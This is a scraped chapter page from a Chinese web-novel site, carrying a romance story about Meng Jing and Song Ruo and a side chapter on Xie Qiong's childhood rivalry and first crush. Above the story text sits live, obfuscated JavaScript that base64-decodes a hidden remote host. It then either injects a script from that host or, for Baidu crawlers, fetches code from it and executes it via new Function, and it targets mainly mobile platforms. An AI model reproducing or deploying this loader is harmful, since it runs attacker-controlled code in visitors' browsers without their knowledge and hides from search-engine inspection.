98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(86(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

大鲸鱼顿时原地满血复活,转过脸求证那我呢,老婆喜欢吗。

宋若抱住她,亲她的唇,最喜欢了。

这一下孟璟就疯了。

当她把身上仅剩的那件吊带也脱下来扔外边,宋若又有点紧张起来了我,我困了

孟璟心想,你困倒是不困,可懒是真懒,一个借口用两次,都不愿意多想想,心里虽然这样腹诽着,她不愿太太有哪怕一点点的不开心,嗲嗲地哄着她,老婆乖啦,做完再睡,不会耽误你睡觉觉。

事实上,最后还是耽误了。

耽误得很严重。

小药瓶哭得好厉害,还一直在叫她的名字。

第103章 xq番外

谢琼小时候常被寄放在外祖家。她懂母亲的意思,和外祖父多亲近,对她的将来大有好处。然而,也许是她与生俱来的城府不得老爷子欢心,长期的共处并没有拉近祖孙之间的距离,反而让她更多地见证了祖父对孟璟的疼爱。

孟璟从来不知隐藏情绪。明明是个小女孩,却永远都是一群人中笑得最夸张的那个,一旦哭起来也绝对惊天地泣鬼神,当然,一般来说,她都是让人哭的那个。一开始,谢琼以为是孟璟这种不加掩饰的天真为她赢得了宠爱,后来她发现她又错了,当孟璟患上抑郁症的时候,变成整个幼儿园里最阴郁的小孩,甚至靠近她都能感到阵阵冷气。即使是这样的孟璟,仍旧得到所有人的疼惜。

比如芬姨。她的寡言芬姨不喜欢,芬姨总说:我们表小姐像个小大人似的。敏感如她,听出来这并不是一句纯粹的夸奖。她想这也许也是她和孟璟不一样的地方,假如换作孟璟得到这个评语,她就会得寸进尺问一句是大人,这么说能喝酒咯?说过也就忘了,而她本人却会因为这句话,循环往复咀嚼良久,最终得出对方不喜欢自己的结论。值得玩味的是,患病后的孟璟,也成了沉默是金的奉行者,芬姨却老是躲在暗处看着她垂泪。因为这不该是孟璟的宿命。

她的生命应该是轻快活泼,充满喜乐的。

就好比她学任何东西,都那样得天独厚。

有人总说谢琼与世无争,其实不是,她铆足了劲要和孟璟一争高下,只怕自她拥有独立意识起,这个念头就在那里了。孟璟学弹钢琴,她也学,孟璟学吉他,学击剑,她也分毫不能落后。只不过都是在谢家,某个周日下午,不经意和母亲提起,要去学个什么。对于她的教育,孟姗姗是不惜代价的,所以给她请最好的老师。孟璟的老师固然不会差,但也不能更好了。可是这位表妹还是很容易就挫伤她的自信心,她考钢琴八级的时候,孟璟早已考过了十级。

她不由有种既生瑜何生亮的感慨。造物主绝对是偏心的。她认为,孟璟绝对是在天赋上有作弊。直到有天,她在孟家过暑假。那天祖父去了战友家,芬姨请假,临时替班的那个保姆打雷都震不醒,谢琼发现,孟璟某天几乎练琴练了个通宵。她在床上辗转反侧,也陪着失眠一整夜,心情有点沮丧,因为对手的勤奋就等于自身的松懈和堕落,但又有点高兴,原来这个世界上,喜好竞争的,不止自己,孟璟不也一样好胜心炽烈吗。

她下楼时,恰逢打着哈欠上楼的孟璟,因此拦着她问了一句:你也想赢我,对不对。

长得像个团子的孟璟半睁着惺忪的眼,眼眶下淡淡的青色,啊?

她指指琴房的方向,钢琴。你练了一晚上。

孟璟一脸不耐烦,好像巴不得快点结束这段对话,好去睡觉,你想多了,刚好想弹而已。

她的话是真是假,谢琼无从得知,但也确实没见她再这样子往死里下功夫。也许孟璟确实是有胜负欲的,只是口头上说得清高,但也许,她就是自己所表现的那样,一切都不上心,感兴趣的时候全身心投入,一旦觉得乏味就抛诸脑后。后边这一种做事三分钟热度的人,是不足为惧的。

可不管孟璟怎样,总之她是一定要比她做得好,这样才能向大家证明,她是更值得的那一个。

那一年,祖父乍得消息,一个姓宋的老战友找到了,他喜极而泣,当即要出发去找人。彼时孟璟恰好跟苏蓁蓁出门了,家里只有她陪着外祖父。她想外祖父也许是想把她留在家,独自前去的,然而恰好前天母亲刚表达了不满,说他跟谢琼不亲,她和孟璟一样,也是你的亲骨肉好吧,怎么一点都不疼我们谢琼。她记得外祖父换好衣服准备出门之前,对着她犹豫了一下,稍后慈祥地笑了,他问她:琼琼,外公出趟远门,你要不要跟外公一起去,出去玩它一天?

坐在汽车后座,安然地装睡着时,她的心跳其实很快。她的生活是早已固定了,每天见熟识的人,做大同小异的事,三点一线,两点一线,即使出去玩,也是在家长允许的安全区域内行动。她第一次要去一个陌生的地方,要见几个她素昧平生的人,她激动极了。虽然表面上还是那样地不动声色。

那宋家的房子好小。她刚进去觉得浑身不自在。为什么好好的大牢房不待,跑到一只小鸟笼里边来了?两个老人痛哭叙旧的场景也让她骇异,那么高那么壮的两个人,何至于哭得那么难看呢。他们家的水也难喝极了,大概主人家见到旧知,情绪过于激动,没有顾虑到她是小孩子,给她倒的也是茶,涩得难以下咽。放下茶杯时,她已经后悔她的来,在家做半天的练习册也比千里迢迢来这受罪强。

爷爷。柔弱清甜的女孩子嗓音将她从无尽的悔恨里拯救出来。她抬眼,门口逆光进来一个小个子女孩,怀里抱着一个小篮子,漫步在走进来将篮子递给她祖父。

宋爷爷和她对答了几句,原来那篮子里的是邻居给她的新剥的莲子,让她带回来祖孙俩一起吃的。宋爷爷微笑地指指她坐的地方,告诉她:若若,看到没有,这个姐姐是孟爷爷家的,你带她去玩。

谢琼坐在椅子里半天没有说话。她半晌醒过神来,后知后觉可能是不太礼貌。她一直盯着那个女生。她进来了,不再逆着光,所以她看清楚了她的脸。可说是她见过最漂亮的人。她那时的词汇还不足以形容那种一见难忘的美。幸而她当时年纪小,否则就要被当成花痴。她自己不难看的,这一点在遇到新的大人,总要惊叹一句可以得知。她表妹孟璟也是好看的,但都比不上眼前这个。她什么时候拉着她出去的,她都不知道,直到她认真地问:你是不是有点儿傻?她才突然醒悟过来,为自己辩护:我不傻。

宋若歪歪头,一头软软的发纷纷滑到左肩,那问你话,你怎么一句也答不上来呢。

她镇定一下,你问我什么。

你吃莲子吗。她跪坐在她跟前的草地上,白皙的手掌心里摊着几颗莲子。到这时候谢琼才有机会看她穿的什么。那是一件非常旧的蓝白格子连衣短裙,洗得太狠了,蓝色也已经接近白色。可是那衣服的简陋一点也不影响她的美,反而像绿叶一样,衬托出她稚气未脱的脸上那惊人的美貌来。

吃。谢琼伸手拿了一颗,碰到了她手掌心的皮肤,竟然觉得脸上热辣辣起来。

很多年以后,她回想初遇的场景,这个看来只有她独自一人记得的印象深刻的会面,她都想,以她的年纪来说,情窦初开实在是太早了一点。可假如不是那一次就喜欢上了若若,后续的自我折磨又成了情不知所起。那天的天很蓝,草很绿,若若很美,她很惊慌。

是夏季,却并不暑热,是凉爽的一天。

她被嘴里的莲子苦得整张脸都皱起来。咽下去不是,吐出来,好像也不行。

她卡在那里的时候,与她并排坐着的宋若发现了她的窘态,皱着眉让她吐掉。

她反而咽了下去。

你不会吃吗,要检查一下莲心摘掉了没有,没有摘掉的话,就会很苦。若若又用她的小膝盖跪坐着,示范性地拿了一颗,摘给她看,把一点翠绿的东西给拔掉了,然后再把那颗白胖胖的莲子递到她嘴边,给。

而她已经被上一颗苦怕了。虽然很想从命,却本能地抗拒着。

再试试,这个不会苦了。漆黑的眼睛盯着她,红润的小嘴吐出这句引诱她的话来。

她张开嘴接住那颗莲子,居然真的就不苦了。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间